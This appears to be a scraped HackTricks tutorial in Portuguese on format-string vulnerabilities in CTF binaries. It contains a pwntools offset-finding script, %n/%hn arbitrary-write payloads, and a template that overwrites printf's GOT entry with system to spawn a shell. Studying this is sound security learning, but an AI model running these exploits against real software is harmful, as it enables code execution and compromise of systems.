Format Strings

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f"AAAA%{i}$x".encode()

Start a new process of the "chall" binary

p = process("./chall")

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output

if b"41414141" in output:

If the string is found, log the success message and break out of the loop

log.success(f"User input is at offset : {i}") break

Close the process

p.close()

</details>

### Quão útil

Leituras arbitrárias podem ser úteis para:

* **Despejar** o **binário** da memória
* **Acessar partes específicas da memória onde informações sensíveis** **são** armazenadas (como canários, chaves de criptografia ou senhas personalizadas como neste [**desafio CTF**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))

## **Escrita Arbitrária**

O formatador **`%<num>$n`** **escreve** o **número de bytes escritos** no **endereço indicado** no parâmetro \<num> na pilha. Se um atacante puder escrever quantos caracteres quiser com printf, ele será capaz de fazer **`%<num>$n`** escrever um número arbitrário em um endereço arbitrário.

Felizmente, para escrever o número 9999, não é necessário adicionar 9999 "A"s à entrada; para isso, é possível usar o formatador **`%.<num-write>%<num>$n`** para escrever o número **`<num-write>`** no **endereço apontado pela posição `num`**.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

No entanto, note que geralmente, para escrever um endereço como 0x08049724 (que é um número ENORME para escrever de uma vez), usa-se $hn em vez de $n. Isso permite escrever apenas 2 Bytes. Portanto, essa operação é feita duas vezes, uma para os 2B mais altos do endereço e outra vez para os mais baixos.

Portanto, essa vulnerabilidade permite escrever qualquer coisa em qualquer endereço (escrita arbitrária).

Neste exemplo, o objetivo será sobrescrever o endereço de uma função na tabela GOT que será chamada mais tarde. Embora isso possa abusar de outras técnicas de escrita arbitrária para exec:

Vamos sobrescrever uma função que recebe seus argumentos do usuário e apontá-la para a função system. Como mencionado, para escrever o endereço, geralmente são necessários 2 passos: Você primeiro escreve 2Bytes do endereço e depois os outros 2. Para isso, usa-se $hn.

• HOB é chamado para os 2 bytes mais altos do endereço

• LOB é chamado para os 2 bytes mais baixos do endereço

Então, por causa de como a string de formato funciona, você precisa escrever primeiro o menor de [HOB, LOB] e depois o outro.

Se HOB < LOB [address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

Se HOB > LOB [address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Modelo Pwntools

Você pode encontrar um modelo para preparar um exploit para esse tipo de vulnerabilidade em:

Ou este exemplo básico de aqui:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings para BOF

É possível abusar das ações de escrita de uma vulnerabilidade de formato de string para escrever em endereços da pilha e explorar um tipo de vulnerabilidade de buffer overflow.

Outros Exemplos & Referências

• https://ir0nstone.gitbook.io/notes/types/stack/format-string

• https://www.youtube.com/watch?v=t1LH9D5cuK4

• https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

• https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html

• 32 bits, sem relro, sem canário, nx, sem pie, uso básico de format strings para vazar a flag da pilha (sem necessidade de alterar o fluxo de execução)

• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html

• 32 bits, relro, sem canário, nx, sem pie, format string para sobrescrever o endereço fflush com a função win (ret2win)

• https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html

• 32 bits, relro, sem canário, nx, sem pie, format string para escrever um endereço dentro de main em .fini_array (para que o fluxo retorne mais uma vez) e escrever o endereço para system na tabela GOT apontando para strlen. Quando o fluxo voltar para main, strlen é executado com a entrada do usuário e apontando para system, ele executará os comandos passados.

Se você está interessado em carreira de hacking e hackear o inhackeável - estamos contratando! (fluência em polonês escrita e falada é necessária).

Apoie o HackTricks

• Confira os planos de assinatura!

• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.

• Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.